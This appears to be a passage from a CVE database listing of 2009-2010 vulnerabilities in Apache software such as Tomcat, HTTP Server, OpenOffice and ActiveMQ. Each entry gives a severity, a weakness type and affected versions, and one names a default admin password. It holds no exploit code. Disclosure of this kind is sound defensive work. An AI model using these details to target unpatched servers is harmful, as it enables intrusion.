Cross-site scripting (XSS) vulnerability in jsp/cal/cal2.jsp in the calendar application in the examples web application in Apache Tomcat on Red Hat Enterprise Linux 5, Desktop Workstation 5, and Linux Desktop 5 allows remote attackers to inject arbitrary web script or HTML via the time parameter, related to "invalid HTML." NOTE: this is due to a missing fix for CVE-2009-0781.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache tomcat *
CVE-2009-2699 MEDIUM

The Solaris pollset feature in the Event Port backend in poll/unix/port.c in the Apache Portable Runtime (APR) library before 1.3.9, as used in the Apache HTTP Server before 2.2.14 and other products, does not properly handle errors, which allows remote attackers to cause a denial of service (daemon hang) via unspecified HTTP requests, related to the prefork and event MPMs.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-667,

Products Affected

Vendor Product Version
apache http_server *
apache portable_runtime *
CVE-2009-2901 MEDIUM

The autodeployment process in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20, when autoDeploy is enabled, deploys appBase files that remain from a failed undeploy, which might allow remote attackers to bypass intended authentication requirements via HTTP requests.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-264,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2009-2902 MEDIUM

Directory traversal vulnerability in Apache Tomcat 5.5.0 through 5.5.28 and 6.0.0 through 6.0.20 allows remote attackers to delete work-directory files via directory traversal sequences in a WAR filename, as demonstrated by the ...war filename.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 6.0
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2009-2949 HIGH

Integer overflow in the XPMReader::ReadXPM function in filter.vcl/ixpm/svt_xpmread.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to execute arbitrary code via a crafted XPM file that triggers a heap-based buffer overflow.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-190,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 4.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 9.10
CVE-2009-2950 HIGH

Heap-based buffer overflow in the GIFLZWDecompressor::GIFLZWDecompressor function in filter.vcl/lgif/decode.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted GIF file, related to LZW decompression.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-787,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 4.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 9.10
CVE-2009-3094 LOW

The ap_proxy_ftp_handler function in modules/proxy/proxy_ftp.c in the mod_proxy_ftp module in the Apache HTTP Server 2.0.63 and 2.2.13 allows remote FTP servers to cause a denial of service (NULL pointer dereference and child process crash) via a malformed reply to an EPSV command.

CVSS 2.0

Severity: LOW

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache http_server *
debian debian_linux 5.0
fedoraproject fedora 12
debian debian_linux 4.0
fedoraproject fedora 10
CVE-2009-3095 MEDIUM

The mod_proxy_ftp module in the Apache HTTP Server allows remote attackers to bypass intended access restrictions and send arbitrary commands to an FTP server via vectors related to the embedding of these commands in the Authorization HTTP header, as demonstrated by a certain module in VulnDisco Pack Professional 8.11.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server *
suse linux_enterprise_server 11
apple mac_os_x *
fedoraproject fedora 12
suse linux_enterprise_server 9
fedoraproject fedora 10
opensuse opensuse 11.1
suse linux_enterprise_server 10
debian debian_linux 4.0
suse linux_enterprise_desktop 10
opensuse opensuse 10.3
opensuse opensuse 11.0
CVE-2009-3301 HIGH

Integer underflow in filter/ww8/ww8par2.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted sprmTDefTable table property modifier in a Word document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-191,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 4.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 9.10
CVE-2009-3302 HIGH

filter/ww8/ww8par2.cxx in OpenOffice.org (OOo) before 3.2 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted sprmTSetBrc table property modifier in a Word document, related to a "boundary error flaw."

CVSS 2.0

Severity: HIGH

Problem Type: CWE-94,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
debian debian_linux 5.0
apache openoffice *
debian debian_linux 4.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 9.10
CVE-2009-3548 HIGH

The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache tomcat 4.1.33
apache tomcat 4.1.29
apache tomcat 6.0
apache tomcat 4.1.34
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.0.22
apache tomcat 5.0.5
apache tomcat 5.0.14
apache tomcat 5.5.18
apache tomcat 4.1.4
apache tomcat 4.1.13
apache tomcat 4.0.3
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.0.27
apache tomcat 4.0.5
apache tomcat 4.1.37
apache tomcat 4.1.39
apache tomcat 3.0
apache tomcat 5.0.23
apache tomcat 5.5.23
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 5.0.19
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 4.1.30
apache tomcat 5.5.8
apache tomcat 4.1.26
apache tomcat 4.1.32
apache tomcat 3.3.1a
apache tomcat 5.0.0
apache tomcat 6.0.5
apache tomcat 4.1.14
apache tomcat 5.5.22
apache tomcat 3.3.2
apache tomcat 5.5.28
apache tomcat 5.0.26
apache tomcat 5.0.12
apache tomcat 5.0.30
apache tomcat 4.1.8
apache tomcat 6.0.13
apache tomcat 3.2.3
apache tomcat 5.0.9
apache tomcat 5.0.29
apache tomcat 4.1.25
apache tomcat 4.1.35
apache tomcat 6.0.18
apache tomcat 5.0.15
apache tomcat 4.0.2
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 5.5.4
apache tomcat 5.5.2
apache tomcat 4.1.0
apache tomcat 5.0.11
apache tomcat 4.1.23
apache tomcat 4.1.6
apache tomcat 5.0.4
apache tomcat 6.0.3
apache tomcat 4.1.3
apache tomcat 6.0.14
apache tomcat 3.3.1
apache tomcat 4.1.2
apache tomcat 5.0.17
apache tomcat 4.0.0
apache tomcat 4.1.18
apache tomcat 5.0.2
apache tomcat 4.1.5
apache tomcat 5.5.14
apache tomcat 4.1.1
apache tomcat 4.1.15
apache tomcat 3.2
apache tomcat 4.0.4
apache tomcat 5.5.11
apache tomcat 4.1.12
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 4.1.17
apache tomcat 5.0.24
apache tomcat 6.0.1
apache tomcat 3.3
apache tomcat 5.0.16
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 4.1.22
apache tomcat 5.0.13
apache tomcat 4.1.7
apache tomcat 4.1.24
apache tomcat 6.0.12
apache tomcat 5.0.28
apache tomcat 4.1.19
apache tomcat 4.1.11
apache tomcat 3.1.1
apache tomcat 5.5.9
apache tomcat 3.2.1
apache tomcat 4.1.38
apache tomcat 4.0.1
apache tomcat 6.0.15
apache tomcat 5.5.1
apache tomcat 5.5.17
apache tomcat 4.1.20
apache tomcat 5.5.3
apache tomcat 4.1.36
apache tomcat 5.0.7
apache tomcat 5.5.24
apache tomcat 6.0.17
apache tomcat 4.1.16
apache tomcat 5.5.12
apache tomcat 4.1.28
apache tomcat 4.1.10
apache tomcat 4.1.31
apache tomcat 5.0.3
apache tomcat 5.0.8
apache tomcat 5.0.21
apache tomcat 4.1.21
apache tomcat 5.0.25
apache tomcat 6.0.6
apache tomcat 5.0.10
apache tomcat 4.0.6
apache tomcat 6.0.10
apache tomcat 5.0.6
apache tomcat 4.1.27
apache tomcat 5.5.20
apache tomcat 4.1.9
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 3.2.2
apache tomcat 3.1
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 3.2.4
apache tomcat 5.0.18
apache tomcat 6.0.9
apache tomcat 5.0.1
CVE-2009-3555 MEDIUM

The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache http_server *
canonical ubuntu_linux 8.10
fedoraproject fedora 12
debian debian_linux 6.0
gnu gnutls *
canonical ubuntu_linux 10.04
canonical ubuntu_linux 10.10
debian debian_linux 7.0
canonical ubuntu_linux 9.04
debian debian_linux 8.0
f5 nginx *
fedoraproject fedora 14
canonical ubuntu_linux 8.04
fedoraproject fedora 13
debian debian_linux 5.0
debian debian_linux 4.0
openssl openssl 1.0
openssl openssl *
fedoraproject fedora 11
mozilla nss *
canonical ubuntu_linux 9.10
CVE-2009-3560 MEDIUM

The big2_toUtf8 function in lib/xmltok.c in libexpat in Expat 2.0.1, as used in the XML-Twig module for Perl, allows context-dependent attackers to cause a denial of service (application crash) via an XML document with malformed UTF-8 sequences that trigger a buffer over-read, related to the doProlog function in lib/xmlparse.c, a different vulnerability than CVE-2009-2625 and CVE-2009-3720.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
libexpat_project libexpat 2.0.1
apache http_server *
CVE-2009-4269 LOW

The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.

CVSS 2.0

Severity: LOW

Problem Type: CWE-310,

Products Affected

Vendor Product Version
apache derby *
CVE-2009-5005 MEDIUM

The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
redhat enterprise_mrg 1.0.2
redhat enterprise_mrg 1.2
redhat enterprise_mrg 1.1.2
apache qpid *
redhat enterprise_mrg 1.0
redhat enterprise_mrg *
redhat enterprise_mrg 1.0.1
redhat enterprise_mrg 1.0.3
redhat enterprise_mrg 1.1.1
CVE-2009-5006 MEDIUM

The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
redhat enterprise_mrg 1.0.2
redhat enterprise_mrg 1.2
redhat enterprise_mrg 1.1.2
apache qpid *
redhat enterprise_mrg 1.0
redhat enterprise_mrg *
redhat enterprise_mrg 1.0.1
redhat enterprise_mrg 1.0.3
redhat enterprise_mrg 1.1.1
CVE-2010-0009 MEDIUM

Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache couchdb 0.9.0
apache couchdb 0.8.1
apache couchdb 0.9.1
apache couchdb 0.10.0
apache couchdb 0.10.1
apache couchdb 0.8.0
apache couchdb 0.9.2
CVE-2010-0010 MEDIUM

Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-189,

Products Affected

Vendor Product Version
apache http_server *
apache http_server 1.3.19
apache http_server 1.3.33
apache http_server 1.0.5
apache http_server 1.3.4
apache http_server 1.1
apache http_server 1.3.22
apache http_server 1.3.10
apache http_server 1.3.14
apache http_server 1.3.34
apache http_server 1.3.29
apache http_server 1.3.15
apache http_server 1.3.27
apache http_server 1.3.36
apache http_server 1.3.39
apache http_server 0.8.11
apache http_server 1.2.6
apache http_server 1.0
apache http_server 1.3.11
apache http_server 1.3.23
apache http_server 1.3.24
apache http_server 1.3.31
apache http_server 1.3.25
apache http_server 1.3.30
apache http_server 1.3.35
apache http_server 1.3.1
apache http_server 1.3.17
apache http_server 1.3.26
apache http_server 1.0.3
apache http_server 1.3.40
apache http_server 1.3
apache http_server 1.3.32
apache http_server 1.3.37
apache http_server 1.2
apache http_server 1.3.12
apache http_server 1.2.4
apache http_server 1.3.28
apache http_server 1.3.13
apache http_server 1.3.20
apache http_server 1.3.2
apache http_server 0.8.14
apache http_server 1.3.0
apache http_server 1.2.5
apache http_server 1.3.18
apache http_server 1.3.38
apache http_server 1.3.3
CVE-2010-0136 HIGH

OpenOffice.org (OOo) 2.0.4, 2.4.1, and 3.1.1 does not properly enforce Visual Basic for Applications (VBA) macro security settings, which allows remote attackers to run arbitrary macros via a crafted document.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-77,

Products Affected

Vendor Product Version
canonical ubuntu_linux 8.10
canonical ubuntu_linux 8.04
apache openoffice 3.1.1
debian debian_linux 5.0
apache openoffice 2.4.1
debian debian_linux 4.0
canonical ubuntu_linux 9.04
canonical ubuntu_linux 9.10
apache openoffice 2.0.4
CVE-2010-0219 HIGH

Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-255,

Products Affected

Vendor Product Version
apache axis2 1.5.1
apache axis2 1.4.1
apache axis2 1.6
apache axis2 1.5.2
apache axis2 1.4
sap businessobjects 3.2
apache axis2 1.5
apache axis2 1.3
CVE-2010-0395 HIGH

OpenOffice.org 2.x and 3.0 before 3.2.1 allows user-assisted remote attackers to bypass Python macro security restrictions and execute arbitrary Python code via a crafted OpenDocument Text (ODT) file that triggers code execution when the macro directory structure is previewed.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
fedoraproject fedora 12
apache openoffice *
debian debian_linux 6.0
canonical ubuntu_linux 10.04
canonical ubuntu_linux 9.04
suse linux_enterprise_desktop 11
opensuse opensuse 11.2
opensuse opensuse 11.1
canonical ubuntu_linux 8.04
fedoraproject fedora 13
debian debian_linux 5.0
suse linux_enterprise_desktop 10
opensuse opensuse 11.0
fedoraproject fedora 11
canonical ubuntu_linux 9.10
CVE-2010-0408 MEDIUM

The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.2.6
apache http_server -
apache http_server 2.2.13
apache http_server 2.2.4
apache http_server 2.2.8
apache http_server 2.2.11
apache http_server 2.2
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.0
apache http_server 2.2.3
apache http_server 2.2.12
CVE-2010-0425 HIGH

modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
ibm http_server 6.0.2.19
broadcom vmware_ace_management_server *
apache http_server 2.0.61
apache http_server 2.3.1
ibm http_server 6.0.2.33
ibm http_server 6.1.0.11
apache http_server 2.2.4
apache http_server 2.2.11
ibm http_server 6.0.2
apache http_server 2.0.36
apache http_server 2.2.1
apache http_server 2.2.0
ibm http_server 6.0.2.31
apache http_server 2.0.44
apache http_server 2.2.12
apache http_server 2.0.47
ibm http_server 6.0.2.3
ibm http_server 6.1.0.5
ibm http_server 6.1.0.13
apache http_server 2.0.32
ibm http_server 6.0.2.35
ibm http_server 6.0.2.21
apache http_server 2.0.40
apache http_server 2.0.48
apache http_server 2.0.49
apache http_server 2.2.13
ibm http_server 6.0.2.1
ibm http_server 6.0.2.39
apache http_server 2.0.35
apache http_server 2.2.8
apache http_server 2.3.3
apache http_server 2.0.46
ibm http_server 6.0.2.29
apache http_server 2.3.2
ibm http_server 6.0.2.27
ibm http_server 6.1.0.9
apache http_server 2.0.59
ibm http_server 6.0.2.15
ibm http_server 6.0.2.23
ibm http_server 6.1.0.2
ibm http_server 6.0.2.37
ibm http_server 6.1
apache http_server 2.0.45
apache http_server 2.2.3
ibm http_server 6.1.0.3
apache http_server 2.0.51
apache http_server 2.0.37
ibm http_server 6.1.0.7
ibm websphere_application_server *
apache http_server 2.2.10
apache http_server *
apache http_server 2.3.6
apache http_server 2.3.5
apache http_server -
ibm http_server 6.0.2.11
apache http_server 2.0.52
apache http_server 2.0.39
ibm http_server 6.1.0.15
apache http_server 2.2.7
apache http_server 2.3.0
ibm http_server 6.1.0.19
apache http_server 2.2.2
ibm http_server 6.0.2.25
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.0.9
apache http_server 2.0.41
apache http_server 2.3.4
ibm http_server 6.0.2.7
ibm http_server 6.1.0.29
apache http_server 2.0.58
ibm http_server 6.0.2.9
apache http_server 2.0.53
apache http_server 2.2.6
apache http_server 2.0.42
apache http_server 2.0.43
apache http_server 2.0.55
ibm http_server 6.1.0.17
apache http_server 2.0.38
apache http_server 2.0.63
apache http_server 2.0.57
ibm http_server 6.1.0.23
apache http_server 2.0.60
ibm http_server 6.0.2.13
ibm http_server 6.1.0.21
apache http_server 2.0.54
ibm http_server 6.1.0.25
apache http_server 2.0.50
apache http_server 2.0.56
apache http_server 2.0.34
ibm http_server 6.1.0.27
apache http_server 2.0.28
oracle http_server 10.1.3.5.0
CVE-2010-0432 MEDIUM

Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2010-0434 MEDIUM

The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 13
debian debian_linux 5.0
debian debian_linux 6.0
fedoraproject fedora 11
CVE-2010-0684 LOW

Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.

CVSS 2.0

Severity: LOW

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache activemq 4.1.0
apache activemq *
apache activemq 1.1
apache activemq 3.1
apache activemq 1.2
apache activemq 3.2
apache activemq 5.1.0
apache activemq 3.0
apache activemq 4.0
apache activemq 4.0.2
apache activemq 1.5
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 1.3
apache activemq 3.2.2
apache activemq 3.2.1
apache activemq 5.2.0
apache activemq 2.1
apache activemq 1.4
apache activemq 2.0
apache activemq 4.1.1
CVE-2010-1151 MEDIUM

Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-362,

Products Affected

Vendor Product Version
apache apache_http_server *
CVE-2010-1157 LOW

Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache tomcat 5.5.14
apache tomcat 5.5.27
apache tomcat 5.5.15
apache tomcat 5.5.11
apache tomcat 5.5.6
apache tomcat 6.0.7
apache tomcat 5.5.18
apache tomcat 6.0.1
apache tomcat 5.5.5
apache tomcat 5.5.7
apache tomcat 5.5.0
apache tomcat 6.0.8
apache tomcat 6.0.12
apache tomcat 5.5.26
apache tomcat 5.5.16
apache tomcat 5.5.9
apache tomcat 6.0.15
apache tomcat 5.5.23
apache tomcat 5.5.1
apache tomcat 6.0.4
apache tomcat 5.5.21
apache tomcat 6.0.2
apache tomcat 5.5.13
apache tomcat 5.5.17
apache tomcat 5.5.8
apache tomcat 5.5.3
apache tomcat 6.0.5
apache tomcat 5.5.24
apache tomcat 5.5.22
apache tomcat 6.0.17
apache tomcat 5.5.28
apache tomcat 5.5.12
apache tomcat 6.0.13
apache tomcat 6.0.26
apache tomcat 6.0.6
apache tomcat 6.0.18
apache tomcat 6.0.20
apache tomcat 5.5.10
apache tomcat 5.5.25
apache tomcat 6.0.10
apache tomcat 5.5.4
apache tomcat 5.5.20
apache tomcat 5.5.2
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 5.5.19
apache tomcat 6.0.11
apache tomcat 6.0.19
apache tomcat 5.5.29
apache tomcat 6.0.24
apache tomcat 6.0.9
apache tomcat 6.0.3
apache tomcat 6.0.14
CVE-2010-1244 MEDIUM

Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache activemq 4.1.0
apache activemq *
apache activemq 1.1
apache activemq 3.1
apache activemq 1.2
apache activemq 3.2
apache activemq 5.1.0
apache activemq 3.0
apache activemq 4.0
apache activemq 4.0.2
apache activemq 1.5
apache activemq 4.0.1
apache activemq 5.0.0
apache activemq 1.3
apache activemq 3.2.2
apache activemq 3.2.1
apache activemq 5.2.0
apache activemq 2.1
apache activemq 1.4
apache activemq 2.0
apache activemq 4.1.1
CVE-2010-1452 MEDIUM

The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
apache http_server 2.2.6
apache http_server 2.2.10
apache http_server *
apache http_server -
apache http_server 2.2.13
apache http_server 2.2.7
apache http_server 2.2.4
apache http_server 2.2.8
apache http_server 2.2.11
apache http_server 2.2
apache http_server 2.2.2
apache http_server 2.2.9
apache http_server 2.2.14
apache http_server 2.2.15
apache http_server 2.2.1
apache http_server 2.2.0
apache http_server 2.2.3
apache http_server 2.2.12
CVE-2010-1587 MEDIUM

The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache activemq 5.3.0
apache activemq 5.3.1
apache activemq 5.0.0
apache activemq 5.2.0
apache activemq 5.4-snapshot
apache activemq 5.1.0
CVE-2010-1623 MEDIUM

Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-119,

Products Affected

Vendor Product Version
apache apr-util 0.9.9
apache apr-util 1.2.13
apache http_server *
apache apr-util 1.1.0
apache apr-util 0.9.14
apache apr-util 0.9.3
apache apr-util 1.1.1
apache apr-util 1.2.8
apache apr-util 1.3.5
apache apr-util 1.1.2
apache apr-util 1.2.1
apache apr-util 0.9.18
apache apr-util 1.3.4
apache apr-util 1.2.7
apache apr-util 1.3.7
apache apr-util 1.3.2
apache apr-util 0.9.11
apache apr-util 1.2.6
apache apr-util 0.9.16
apache apr-util 0.9.10
apache apr-util 1.3.0
apache apr-util 0.9.8
apache apr-util 1.2.12
apache apr-util 1.3.1
apache apr-util 0.9.6
apache apr-util 1.3.6
apache apr-util *
apache apr-util 0.9.2
apache apr-util 1.2.9
apache apr-util 1.0.1
apache apr-util 0.9.13
apache apr-util 0.9.17
apache apr-util 1.3.8
apache apr-util 1.2.2
apache apr-util 1.3.3
apache apr-util 0.9.1
apache apr-util 0.9.12
apache apr-util 1.0
apache apr-util 0.9.7
apache apr-util 0.9.5
apache apr-util 0.9.15
apache apr-util 1.0.2
apache apr-util 0.9.4
apache apr-util 1.2.10
CVE-2010-1632 HIGH

